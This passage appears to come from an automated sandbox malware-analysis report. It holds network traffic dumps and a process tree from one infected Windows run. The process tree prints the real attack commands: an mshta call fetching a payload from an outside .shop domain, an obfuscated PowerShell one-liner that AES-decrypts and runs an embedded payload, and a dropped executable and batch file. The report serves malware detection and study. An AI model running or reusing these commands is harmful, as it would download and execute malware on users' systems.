                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 72 65 64 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 56 32 54 59 74 51 6e 74 61 30 4a 35 44 66 65 31 66 68 57 76 53 49 6d 4c 53 38 49 5c 75 30 30 33 64 22 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 69 68 6e 6c 63 65 6e 6f 63 65 68 67 64 61 65 67 64 6d 68 62 69 64 6a 68 6e 68 64 63 68 66 6d 6d 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6e 6f 75 70 64 61 74 65 22 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 6e 65 69 66 61 6f 69 6e 64 67 67 66 63 6a 69 63 66 66 6b 67 70 6d 6e 6c 70 70 65 66 66 61 62 64 22 2c 22 63 6f
                                                                                                                                                            Data Ascii: red":true,"hash":"V2TYtQnta0J5Dfe1fhWvSImLS8I\u003d"}]}}}},{"appid":"ihnlcenocehgdaegdmhbidjhnhdchfmm","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"ok"},"updatecheck":{"status":"noupdate"}},{"appid":"neifaoindggfcjicffkgpmnlppeffabd","co
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 74 6d 2e 63 72 78 33 22 2c 22 66 70 22 3a 22 31 2e 63 39 30 30 62 61 39 61 32 64 38 33 31 38 32 36 33 66 64 34 33 37 38 32 65 65 36 66 64 35 66 62 35 30 62 61 64 37 38 62 66 30 65 62 32 63 39 37 32 62 35 39 32 32 63 34 35 38 61 66 34 35 65 64 22 2c 22 72 65 71 75 69 72 65 64 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 6d 4d 64 44 68 6b 67 66 46 78 73 4a 79 35 53 51 4b 42 61 49 4f 53 37 76 76 39 30 5c 75 30 30 33 64 22 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22
                                                                                                                                                            Data Ascii: tm.crx3","fp":"1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed","required":true,"hash":"mMdDhkgfFxsJy5SQKBaIOS7vv90\u003d"}]}}}},{"appid":"hnimpnehoodheedghdeeijklkeaacbdc","cohort":"1::","status":"ok","cohortname":"","ping":{"status":"
                                                                                                                                                            2024-02-20 22:47:04 UTC342INData Raw: 34 39 32 5f 68 6e 69 6d 70 6e 65 68 6f 6f 64 68 65 65 64 67 68 64 65 65 69 6a 6b 6c 6b 65 61 61 63 62 64 63 2e 63 72 78 22 2c 22 66 70 22 3a 22 31 2e 36 66 36 62 63 39 33 64 63 64 36 32 64 63 32 35 31 38 35 30 64 32 66 66 34 35 38 66 64 61 39 36 30 38 33 63 65 62 37 66 62 65 38 65 65 62 31 31 32 34 38 62 38 34 38 35 65 66 32 61 65 61 32 33 22 2c 22 72 65 71 75 69 72 65 64 22 3a 74 72 75 65 7d 5d 7d 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 67 63 6d 6a 6b 6d 67 64 6c 67 6e 6b 6b 63 6f 63 6d 6f 65 69 6d 69 6e 61 69 6a 6d 6d 6a 6e 69 69 22 2c 22 63 6f 68 6f 72 74 22 3a 22 31 3a 62 6d 31 3a 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 53 74 61 62 6c 65 22 2c 22 70 69 6e 67 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f
                                                                                                                                                            Data Ascii: 492_hnimpnehoodheedghdeeijklkeaacbdc.crx","fp":"1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23","required":true}]}}}},{"appid":"gcmjkmgdlgnkkcocmoeiminaijmmjnii","cohort":"1:bm1:","status":"ok","cohortname":"Stable","ping":{"status":"o
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33 66 6a 72 34 62 63 34 78 35 76 77 75 69 6c 64 65 71 5f 39 2e 34 39 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 33 72 6d 33 63 69 71 73 33
                                                                                                                                                            Data Ascii: edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3rm3ciqs3fjr4bc4x5vwuildeq_9.49.1/"},{"codebase":"http://dl.google.com/release2/chrome_component/ad3rm3ciqs3
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 77 65 34 32 35 78 6c 7a 71 33 32 67 78 6c 35 62 77 32 34 71 64 6f 6c 62 64 61 5f 32 30 32 34 2e 31 2e 32 2e 31 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63
                                                                                                                                                            Data Ascii: e":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"http://dl.google.com/release2/chrome_component/adwe425xlzq32gxl5bw24qdolbda_2024.1.2.1/"},{"codebase":"https://dl.google.com/release2/c
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 64 68 69 6f 6a 34 35 68 7a 6a 6b 66 75 6e 6e 37 63 63 72 62 71 79 79 68 75 33 71 5f 32 30 32 33 30 39 31 36 2e 35 36 37 38 35 34 36 36 37 2e 31 34 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f
                                                                                                                                                            Data Ascii: /edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"http://dl.google.com/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567854667.14/"},{"codebase":"https://dl.google.com/release2/chrome_co
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 6b 33 62 37 64 66 63 66 36 6f 6f 35 65 79 6a 63 70 74 74 63 65 68 72 37 65 75 5f 38 35 35 39 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 6b 33 62 37 64 66 63 66 36 6f 6f 35 65
                                                                                                                                                            Data Ascii: ":{"status":"ok"},"updatecheck":{"status":"ok","urls":{"url":[{"codebase":"http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/k3b7dfcf6oo5eyjcpttcehr7eu_8559/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/k3b7dfcf6oo5e
                                                                                                                                                            2024-02-20 22:47:04 UTC1252INData Raw: 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 64 6c 2e 6d 65 2e 67 76 74 31 2e 63 6f 6d 2f 65 64 67 65 64 6c 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f 36 33 2f 22 7d 2c 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 64 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 32 2f 63 68 72 6f 6d 65 5f 63 6f 6d 70 6f 6e 65 6e 74 2f 61 63 65 7a 79 6a 79 74 32 66 70 32 78 35 33 64 68 79 71 62 76 74 33 67 78 64 6c 71 5f
                                                                                                                                                            Data Ascii: ease2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_63/"},{"codebase":"http://dl.google.com/release2/chrome_component/acezyjyt2fp2x53dhyqbvt3gxdlq_


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            15192.168.2.549745142.250.72.1104437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:47:34 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000005071B001ED HTTP/1.1
                                                                                                                                                            Host: clients1.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            2024-02-20 22:47:34 UTC817INHTTP/1.1 200 OK
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-g0p4jbFY4d8tWveUHuXVzg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lhrlbDQmhYmjmjY4kAqOVA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 220
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:47:34 GMT
                                                                                                                                                            Expires: Tue, 20 Feb 2024 22:47:34 GMT
                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:47:34 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 38 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 37 30 65 61 35 65 61 35 0a
                                                                                                                                                            Data Ascii: rlzC1: 1C1ONGR_enUS1098rlzC2: 1C2ONGR_enUS1098rlzC7: 1C7ONGR_enUS1098dcc: set_dcc: C1:1C1ONGR_enUS1098,C2:1C2ONGR_enUS1098,C7:1C7ONGR_enUS1098events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 70ea5ea5


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:23:45:54
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\forfiles.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup
                                                                                                                                                            Imagebase:0x7ff663820000
                                                                                                                                                            File size:52'224 bytes
                                                                                                                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:23:45:54
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:23:45:54
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:start mshta http://whitemansearch.shop/setup
                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:23:45:56
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup
                                                                                                                                                            Imagebase:0x7ff74b3e0000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:23:45:57
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:23:45:58
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:23:45:58
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:23:46:00
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:23:46:02
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:23:46:02
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1972,i,9908124520727013637,16052359887422154875,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:23:46:04
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:23:46:08
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ClassroomEc.exe"
                                                                                                                                                            Imagebase:0xd60000
                                                                                                                                                            File size:1'212'711 bytes
                                                                                                                                                            MD5 hash:956D074F7C6BD174C43586F07892E820
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:23:46:08
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:23:46:13
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

